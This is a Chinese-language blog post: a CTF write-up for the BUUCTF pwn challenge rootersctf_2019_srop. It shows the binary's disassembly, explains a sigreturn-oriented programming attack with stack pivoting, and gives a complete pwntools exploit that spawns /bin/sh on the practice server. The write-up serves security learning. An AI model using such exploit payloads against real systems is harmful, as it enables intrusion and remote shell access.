<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="Ev3r"><meta name="copyright" content="Ev3r"><meta name="generator" content="Hexo 5.4.0"><meta name="theme" content="hexo-theme-yun"><title>BUU-rootersctf_2019_srop | Ev3r's blog</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/star-markdown-css@0.1.24/dist/yun/yun-markdown.min.css"><script src="//at.alicdn.com/t/font_1140697_ed8vp4atwoj.js" async></script><script src="https://cdn.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>document.addEventListener("DOMContentLoaded", () => {
  [".post-card",".post-content img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
});
</script><link id="light-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism.css" media="(prefers-color-scheme: light)"><link id="dark-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism-tomorrow.css" media="(prefers-color-scheme: dark)"><link rel="shortcut icon" type="image/svg+xml" href="/yun.svg"><link rel="mask-icon" href="/yun.svg" color="#0078E7"><link rel="alternate icon" href="/yun.ico"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="preload" href="/js/utils.js" as="script"><link rel="preload" href="/js/hexo-theme-yun.js" as="script"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><script id="yun-config">
    const Yun = window.Yun || {};
    window.CONFIG = {"hostname":"example.com","root":"/","title":"Ev3r","version":"1.5.2","mode":"auto","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"想要搜什么，来这里","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.jsdelivr.net/gh/YunYouJun/cdn/img/avatar/none.jpg","say":{"api":"https://el-bot-api.vercel.app/api/words/young"},"fireworks":{"colors":["102, 167, 221","62, 131, 225","33, 78, 194"]}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/utils.js"></script><script src="/js/hexo-theme-yun.js"></script><link rel="preconnect" href="https://www.google-analytics.com" crossorigin><script async src="https://www.googletagmanager.com/gtag/js?id=UA-121354150-1"></script><script>if (CONFIG.hostname === location.hostname) {
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA-121354150-1');
}</script><script data-ad-client="ca-pub-2245427233262012" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script>(function(){
  var bp = document.createElement('script');
  var curProtocol = window.location.protocol.split(':')[0];
  if (curProtocol === 'https') {
    bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
  }
  else {
    bp.src = 'http://push.zhanzhang.baidu.com/push.js';
  }
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(bp, s);
})();</script><!-- Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-M9KWR9L');</script><!-- End Google Tag Manager --><meta name="description" content="一道srop的题，学完之后不包括demo和360ichunqiu的第一个srop的题目。 当时没写出来，想着去重复利用那个read完成栈迁移或者利用write去泄露地址，结果忽略了pop eax这个gadget导致，卡住了。 后来看了一下WP说这个gadget，然后发现还蛮简单的。 0000000000401000 sub_401000      proc near">
<meta property="og:type" content="article">
<meta property="og:title" content="BUU-rootersctf_2019_srop">
<meta property="og:url" content="http://example.com/2021/04/26/BUU-rootersctf-2019-srop/index.html">
<meta property="og:site_name" content="Ev3r&#39;s blog">
<meta property="og:description" content="一道srop的题，学完之后不包括demo和360ichunqiu的第一个srop的题目。 当时没写出来，想着去重复利用那个read完成栈迁移或者利用write去泄露地址，结果忽略了pop eax这个gadget导致，卡住了。 后来看了一下WP说这个gadget，然后发现还蛮简单的。 0000000000401000 sub_401000      proc near">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2021-04-26T03:07:43.000Z">
<meta property="article:modified_time" content="2021-04-26T04:13:11.270Z">
<meta property="article:author" content="Ev3r">
<meta property="article:tag" content="SROP">
<meta name="twitter:card" content="summary"><script src="/js/ui/mode.js"></script></head><body><script defer src="https://cdn.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-list-ordered"></use></svg></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-passport-line"></use></svg></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info mickey-mouse"><a class="site-author-avatar" href="/about/" title="Ev3r"><img width="96" loading="lazy" src="/images/head.jpg" alt="Ev3r"><span class="site-author-status" title="nothing for pwn">🙂</span></a><div class="site-author-name"><a href="/about/">Ev3r</a></div><span class="site-name">Ev3r's blog</span><sub class="site-subtitle"></sub><div class="site-desciption"></div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="我的主页"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-home-4-line"></use></svg></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-archive-line"></use></svg></span><span class="site-state-item-count">74</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-2-line"></use></svg></span><span class="site-state-item-count">7</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="site-state-item-count">38</span></a></div><a class="site-state-item hty-icon-button" href="/about/#comment" title="留言板"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-clipboard-line"></use></svg></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="/atom.xml" title="RSS" target="_blank" style="color:orange"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-rss-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/myenid?tab=repositories" title="GitHub" target="_blank" style="color:#181717"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-github-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://ctf-wiki.org/pwn/readme/" title="Wiki" target="_blank" style="color:#0084FF"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-zhihu-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://space.bilibili.com/504533786" title="哔哩哔哩动画" target="_blank" style="color:#FF8EB3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-bilibili-line"></use></svg></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" target="_blank" rel="noopener" href="https://mlysoft.cn/cross.html" title="js师傅" style="color:dodgerblue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-genderless-line"></use></svg></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-contrast-2-line"></use></svg></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#exp"><span class="toc-number">1.</span> <span class="toc-text">exp</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%9D%E8%80%83"><span class="toc-number">2.</span> <span class="toc-text">思考</span></a></li></ol></div></div></div><div class="tag-cloud"><div class="tag-cloud-tags"><a href="/tags/BJDCTF-2nd%E5%A4%8D%E7%8E%B0/" style="font-size: 21px; color: #4d89c0">BJDCTF 2nd复现</a> <a href="/tags/IO-FILE/" style="font-size: 12px; color: #999">IO_FILE</a> <a href="/tags/IO%E5%88%A9%E7%94%A8/" style="font-size: 16.5px; color: #7391ad">IO利用</a> <a href="/tags/Linux/" style="font-size: 21px; color: #4d89c0">Linux</a> <a href="/tags/Nep2021/" style="font-size: 12px; color: #999">Nep2021</a> <a href="/tags/SROP/" style="font-size: 25.5px; color: #2680d4">SROP</a> <a href="/tags/UAF/" style="font-size: 30px; color: #0078e7">UAF</a> <a href="/tags/VNCTF2021/" style="font-size: 12px; color: #999">VNCTF2021</a> <a href="/tags/Web-tools/" style="font-size: 12px; color: #999">Web-tools</a> <a href="/tags/ciscn2021/" style="font-size: 12px; color: #999">ciscn2021</a> <a href="/tags/debug/" style="font-size: 12px; color: #999">debug</a> <a href="/tags/double-free/" style="font-size: 16.5px; color: #7391ad">double_free</a> <a href="/tags/fastbin/" style="font-size: 12px; color: #999">fastbin</a> <a href="/tags/fastbin-attack/" style="font-size: 12px; color: #999">fastbin-attack</a> <a href="/tags/libc%E6%B3%84%E9%9C%B2/" style="font-size: 16.5px; color: #7391ad">libc泄露</a> <a href="/tags/off-by-one%E5%8E%9F%E7%90%86%E5%92%8C%E5%88%A9%E7%94%A8/" style="font-size: 12px; color: #999">off_by_one原理和利用</a> <a href="/tags/orw%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8/" style="font-size: 12px; color: #999">orw系统调用</a> <a href="/tags/overflow/" style="font-size: 12px; color: #999">overflow</a> <a href="/tags/overlap/" style="font-size: 12px; color: #999">overlap</a> <a href="/tags/overlapping/" style="font-size: 12px; color: #999">overlapping</a></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article"><link itemprop="mainEntityOfPage" href="http://example.com/2021/04/26/BUU-rootersctf-2019-srop/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Ev3r"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="Ev3r's blog"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">BUU-rootersctf_2019_srop<a class="post-edit-link" href="https://github.com/myenid/myenid.github.io_posts/BUU-rootersctf-2019-srop.md" target="_blank" title="编辑" rel="noopener"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-edit-line"></use></svg></a></h1><div class="post-meta"><div class="post-time" style="display:inline-block"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-line"></use></svg></span> <time title="创建时间：2021-04-26 11:07:43" itemprop="dateCreated datePublished" datetime="2021-04-26T11:07:43+08:00">2021-04-26</time></div><span class="leancloud_visitors" id="/2021/04/26/BUU-rootersctf-2019-srop/" data-flag-title="BUU-rootersctf_2019_srop"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span class="leancloud-visitors-count"></span></span></span><span class="post-meta-divider">-</span><a href="#comment"><span class="post-meta-item-icon" title="评论数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-chat-3-line"></use></svg> <span class="waline-comment-count" id="/2021/04/26/BUU-rootersctf-2019-srop/"></span></span></a><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-line"></use></svg></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category" href="/categories/pwn-WP/" style="--text-color:orange" itemprop="url" rel="index"><span itemprop="text">pwn-WP</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag" href="/tags/SROP/" style="--text-color:dimgray"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">SROP</span></a></span></div><div class="post-author"><span class="author-name">Ev3r</span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body" style="--smc-primary:#0078E7;"><p> 一道srop的题，学完之后不包括demo和360ichunqiu的第一个srop的题目。</p>
<p>当时没写出来，想着去重复利用那个read完成栈迁移或者利用write去泄露地址，结果忽略了<code>pop eax</code>这个<code>gadget</code>导致，卡住了。</p>
<p>后来看了一下WP说这个<code>gadget</code>，然后发现还蛮简单的。</p>
<pre class="line-numbers language-none"><code class="language-none">0000000000401000 sub_401000      proc near               ; CODE XREF: start↓p
.text:0000000000401000                                         ; DATA XREF: LOAD:0000000000400088↑o
.text:0000000000401000
.text:0000000000401000 buf             &#x3D; byte ptr -80h
.text:0000000000401000
.text:0000000000401000                 push    rbp
.text:0000000000401001                 mov     rbp, rsp
.text:0000000000401004                 sub     rsp, 64
.text:0000000000401008                 mov     eax, 1
.text:000000000040100D                 mov     edi, 1          ; fd
.text:0000000000401012                 lea     rsi, buf        ; &quot;Hey, can i get some feedback for the CT&quot;...
.text:000000000040101A                 mov     edx, 2Ah        ; count
.text:000000000040101F                 syscall                 ; LINUX - sys_write
.text:0000000000401021                 mov     edi, 0          ; fd
.text:0000000000401026                 lea     rsi, [rsp+40h+buf] ; buf
.text:000000000040102B                 mov     edx, 400h       ; count
.text:0000000000401030                 push    0
.text:0000000000401032                 pop     rax
.text:0000000000401033                 syscall                 ; LINUX - sys_read
.text:0000000000401035                 leave
.text:0000000000401036                 retn
.text:0000000000401036 sub_401000      endp
.text:0000000000401036
.text:0000000000401037
.text:0000000000401037 ; &#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D; S U B R O U T I N E &#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;
.text:0000000000401037
.text:0000000000401037 ; Attributes: noreturn
.text:0000000000401037
.text:0000000000401037                 public start
.text:0000000000401037 start           proc near               ; DATA XREF: LOAD:0000000000400018↑o
.text:0000000000401037                 call    sub_401000
.text:000000000040103C                 mov     eax, 60
.text:0000000000401041                 mov     edi, 0          ; error_code
.text:0000000000401046                 syscall                 ; LINUX - sys_exit<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>总的流程在上面，调用read的时候有个溢出，然后通过<code>pop eax;syscall;leave;ret</code>这个<code>gadget</code>可以进行控制系统调用。典型的SROP</p>
<p>然后就上了。首先我调用的是一个read，还是栈迁移，然后注意这里的systcall后面还有个leave，所以要在read进去的地方填充八个垃圾字符，然后在新的栈上布局新的syscall达到getshell的目的。</p>
<p>栈地址选在了buf的data段</p>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
context<span class="token punctuation">(</span>log_level <span class="token operator">=</span> <span class="token string">'debug'</span><span class="token punctuation">,</span>arch <span class="token operator">=</span> <span class="token string">'amd64'</span><span class="token punctuation">,</span>os <span class="token operator">=</span> <span class="token string">'linux'</span><span class="token punctuation">)</span>

pop_rax_syscall_leave_ret <span class="token operator">=</span> <span class="token number">0x401032</span>
syscall_ret <span class="token operator">=</span> <span class="token number">0x401033</span>
data <span class="token operator">=</span> <span class="token number">0x402000</span>

<span class="token comment">#sh = process('./rootersctf_2019_srop')</span>
sh <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token string">'node3.buuoj.cn'</span><span class="token punctuation">,</span><span class="token string">'26664'</span><span class="token punctuation">)</span>
<span class="token comment"># mov rsp</span>
frame <span class="token operator">=</span> SigreturnFrame<span class="token punctuation">(</span><span class="token punctuation">)</span>
frame<span class="token punctuation">.</span>rsp <span class="token operator">=</span> data
frame<span class="token punctuation">.</span>rbp <span class="token operator">=</span> data
frame<span class="token punctuation">.</span>rip <span class="token operator">=</span> syscall_ret
frame<span class="token punctuation">.</span>rax <span class="token operator">=</span> constants<span class="token punctuation">.</span>SYS_read
frame<span class="token punctuation">.</span>rdi <span class="token operator">=</span> <span class="token number">0</span> <span class="token comment">#fd</span>
frame<span class="token punctuation">.</span>rsi <span class="token operator">=</span> data <span class="token comment">#buf</span>
frame<span class="token punctuation">.</span>rdx <span class="token operator">=</span> <span class="token number">0x300</span> <span class="token comment">#count</span>

payload <span class="token operator">=</span> <span class="token string">'a'</span><span class="token operator">*</span><span class="token number">0x80</span> <span class="token operator">+</span> <span class="token string">'junkjunk'</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>pop_rax_syscall_leave_ret<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span><span class="token number">15</span><span class="token punctuation">)</span>
payload <span class="token operator">+=</span> <span class="token builtin">str</span><span class="token punctuation">(</span>frame<span class="token punctuation">)</span>

sh<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'?\n'</span><span class="token punctuation">)</span>
<span class="token comment">#attach(sh,'b *0x401021')</span>
sh<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
sleep<span class="token punctuation">(</span><span class="token number">0.3</span><span class="token punctuation">)</span>
<span class="token comment">#pause()</span>
<span class="token comment">#sh.send('/bin/sh\x00')</span>
frame <span class="token operator">=</span> SigreturnFrame<span class="token punctuation">(</span><span class="token punctuation">)</span>
frame<span class="token punctuation">.</span>rip <span class="token operator">=</span> syscall_ret
frame<span class="token punctuation">.</span>rax <span class="token operator">=</span> constants<span class="token punctuation">.</span>SYS_execve
frame<span class="token punctuation">.</span>rdi <span class="token operator">=</span> data<span class="token operator">+</span><span class="token number">0x150</span>

payload1 <span class="token operator">=</span> <span class="token string">'a'</span><span class="token operator">*</span><span class="token number">8</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>pop_rax_syscall_leave_ret<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span><span class="token number">15</span><span class="token punctuation">)</span>
payload1 <span class="token operator">+=</span> <span class="token builtin">str</span><span class="token punctuation">(</span>frame<span class="token punctuation">)</span>
sh<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload1<span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">0x150</span><span class="token punctuation">,</span><span class="token string">'a'</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'/bin/sh\x00'</span><span class="token punctuation">)</span>

sh<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<h3 id="思考"><a href="#思考" class="headerlink" title="思考"></a>思考</h3><p>当时还想过，直接read写/bin/sh\x00到data段，然后rsp设置成<code>pop eax</code>那个<code>gadget</code>，但是最后被这个leave挡住了，地址是对的，想要设置<code>ebp= xxx-0x8</code>去绕过<code>leave</code>但是发现失败了，系统把这个解析成了内容。</p>
<p>发现SROP，栈迁移，然后在新的栈上布置ROP是真的香。唯一注意的就是<strong>这个sigreturn是恢复寄存器</strong>，恢复之后执行的是<code>rip</code>寄存器的内容。</p>
<p>所以有时候填充还需要考虑我们拿到的gadget到底是什么。</p>
</div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>Ev3r</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="http://example.com/2021/04/26/BUU-rootersctf-2019-srop/" title="BUU-rootersctf_2019_srop">http://example.com/2021/04/26/BUU-rootersctf-2019-srop/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-Ev3r/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-EV3R 4.0 "><svg class="icon"><use xlink:href="#icon-creative-commons-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-by-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-Ev3r-line"></use></svg></a> 许可协议。</li></ul></section></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2021/04/26/BUU-ciscn-2019-es-7/" rel="prev" title="BUU-ciscn_2019_es_7"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-left-s-line"></use></svg><span class="post-nav-text">BUU-ciscn_2019_es_7</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/2021/04/26/BUU-360chunqiu2017-smallest/" rel="next" title="BUU-360chunqiu2017_smallest"><span class="post-nav-text">BUU-360chunqiu2017_smallest</span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-right-s-line"></use></svg></a></div></div></div><div class="hty-card" id="comment"><div class="comment-tooltip text-center"><span>如果您有任何关于博客内容的相关讨论，欢迎前往 <a href="https://github.com/YunYouJun/yunyoujun.github.io/discussions" target="_blank">GitHub Discussions</a> 与我交流。</span><br></div><div id="waline"></div><script>Yun.utils.getScript("https://cdn.jsdelivr.net/npm/@waline/client/dist/Waline.min.js", () => {
  const walineConfig = {"enable":true,"serverURL":"https://waline.yunyoujun.cn","comment":true,"visitor":true,"avatarCDN":"https://cdn.v2ex.com/gravatar/","placeholder":"填写邮箱，可以收到回复通知哦～","requiredFields":["nick"],"el":"#waline","lang":"zh-CN"}
  walineConfig.path = "/2021/04/26/BUU-rootersctf-2019-srop/"
  new Waline(walineConfig)
}, window.Waline);</script></div></main><footer class="sidebar-translate" id="footer"><div class="beian"><a rel="noopener" href="https://beian.miit.gov.cn/" target="_blank">这里是</a></div><div class="copyright"><span>&copy; 2021 </span><span class="with-love" id="animate"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-cloud-line"></use></svg></span><span class="author"> Ev3r</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v5.4.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.5.2</span></div><div class="live_time"><span>本博客已诞生</span><span id="display_live_time"></span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  setTimeout(blog_live_time, 1000);
  const start = new Date('2021-03-10T00:00:00');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";
}
blog_live_time();
</script></div><div class="footer-custom-text">pwn菜鸡</a></div></footer><a class="hty-icon-button" id="goUp" aria-label="back-to-top" href="#"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-up-s-line"></use></svg><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a><script>const date = new Date();
const today = (date.getMonth() + 1) + "-" + date.getDate()
const mourn_days = ["4-4"]
if (mourn_days.includes(today)) {
  document.documentElement.style.filter = "grayscale(1)";
}</script></div></body></html>